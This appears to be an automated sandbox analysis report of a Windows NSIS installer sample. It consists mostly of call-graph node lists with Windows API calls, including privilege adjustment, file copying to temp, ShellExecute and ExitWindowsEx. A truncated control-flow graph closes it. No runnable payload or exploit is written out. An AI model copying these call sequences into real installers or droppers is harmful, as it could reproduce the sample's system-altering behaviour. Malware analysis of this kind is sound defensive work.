3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                            Executed Functions

                            Function 00403640 Relevance: 88.0, APIs: 34, Strings: 16, Instructions: 450stringfilecomCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 